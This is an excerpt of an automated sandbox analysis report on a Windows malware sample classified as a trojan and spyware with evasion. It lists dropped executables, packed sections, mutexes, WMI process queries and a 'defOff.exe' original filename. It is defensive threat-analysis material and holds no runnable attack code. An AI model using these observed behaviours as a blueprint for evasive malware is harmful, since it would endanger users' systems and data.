Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C47E61 9_3_05C47E61
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C467A8 9_3_05C467A8
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Code function: 9_3_05C466F4 9_3_05C466F4
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\num[1].exe A8ADDC675FCC27C94FF9E4775BB2E090F4DA1287AAE6B95CECC65CCF533BC61D
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.2253549929.00000000066F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253103189.0000000006606000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2266932981.0000000006677000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2265437678.000000000653A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2268030708.0000000006537000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248868445.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2245592209.0000000006539000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2246417878.000000000653A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2281042245.0000000006127000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2250953883.0000000006538000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249066149.0000000006535000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2246790710.0000000006537000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2255153333.000000000653C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2281066171.00000000061BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2263872838.0000000006533000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2267330590.000000000667A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2239197867.0000000006264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2267794673.000000000667A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2256518055.0000000006537000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2269140699.000000000653E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2244684749.000000000630E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249515673.0000000006533000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247252195.000000000653F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247809832.0000000005F55000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2251478950.000000000653A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2252326241.0000000006535000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2254579510.0000000006534000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2266244675.00000000067B0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2267146775.0000000006534000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253233305.0000000006534000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2255331705.000000000662B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249996965.0000000006538000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2256028154.000000000662C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247973865.0000000006538000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2255720187.0000000006625000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2280639357.0000000001680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2268908253.00000000067D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2252183168.00000000066C8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2278500889.00000000067F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248703388.0000000006541000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2263558822.0000000006532000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2252987298.0000000006532000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247378756.0000000005F5A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2259209581.000000000653F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248551968.0000000005F60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2256659893.000000000663F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2255517446.0000000006532000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2255890389.0000000006535000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2254794624.000000000661F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2258199575.0000000006534000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2245872021.0000000005F59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2261248685.000000000664E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2252866733.000000000660D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2258936338.0000000006750000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2251140884.0000000005F59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2264532597.0000000006653000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2262102496.000000000665D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2254972636.0000000006706000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2265012231.0000000006791000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2257081208.000000000663C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2279546499.000000000616A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2239197867.000000000630E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2252061469.00000000065FB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253793873.0000000006617000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2263119888.000000000677E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2246621919.0000000005F53000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2257854902.0000000006636000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253674528.0000000006533000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2251931254.0000000006539000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248377132.0000000006538000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2248225347.0000000005F5D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2254257944.0000000006539000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253423129.000000000660E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2267579684.0000000006539000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2263714648.0000000006657000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2260084808.000000000653A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2258612331.000000000663A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2268416533.000000000667B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2266684920.000000000653C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2254401700.0000000006613000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2279711366.00000000061DB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2263405512.000000000665D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2260933755.0000000006532000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247102977.0000000005F53000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2239197867.00000000062B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2245437476.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2254133927.0000000006614000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2256803328.0000000006537000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2246288069.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2250242748.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2250552759.0000000006536000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2257515348.0000000006532000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2251811960.0000000005F54000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2259655041.000000000664C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2262796311.000000000665D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2256371348.000000000672C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2250704767.0000000005F55000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2261798666.000000000653C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2252566867.000000000653C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2279312842.0000000006264000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2252445213.0000000006605000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2263285706.0000000006532000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2247517629.0000000006533000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2260534426.0000000006647000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2265813956.000000000666E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2262344009.000000000653A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2246151043.0000000006535000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249796689.0000000005F55000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2280496191.00000000016A6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2253913423.0000000006539000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2249317718.0000000005F55000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2261533163.0000000006768000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9980713655956113
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: Section: ZLIB complexity 0.9979510814032697
Source: NX5XML9A4AMIPXG5AGRT0AH025A0.exe.0.dr Static PE information: Section: ibghtiqx ZLIB complexity 0.9943954568461307
Source: skotes.exe.4.dr Static PE information: Section: ZLIB complexity 0.9979510814032697
Source: skotes.exe.4.dr Static PE information: Section: ibghtiqx ZLIB complexity 0.9943954568461307
Source: random[1].exe.8.dr Static PE information: Section: ZLIB complexity 0.9980713655956113
Source: c1b0009d40.exe.8.dr Static PE information: Section: ZLIB complexity 0.9980713655956113
Source: random[1].exe0.8.dr Static PE information: Section: tnleqdlj ZLIB complexity 0.9949933236506746
Source: 7a5878ed96.exe.8.dr Static PE information: Section: tnleqdlj ZLIB complexity 0.9949933236506746
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: Section: ZLIB complexity 0.9979510814032697
Source: GCVLAW8OP2HD5YHJC3.exe.9.dr Static PE information: Section: ibghtiqx ZLIB complexity 0.9943954568461307
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: Section: ZLIB complexity 0.9979510814032697
Source: 1QL5CL9NMBWTM5JDZ.exe.11.dr Static PE information: Section: ibghtiqx ZLIB complexity 0.9943954568461307
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: Section: ZLIB complexity 0.9979510814032697
Source: EGCHWF62L351BCP5BKZSSW.exe.25.dr Static PE information: Section: ibghtiqx ZLIB complexity 0.9943954568461307
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@87/42@86/14
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1664VO856PFRR45SNXLF.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5028:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:516:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4112:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2928:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
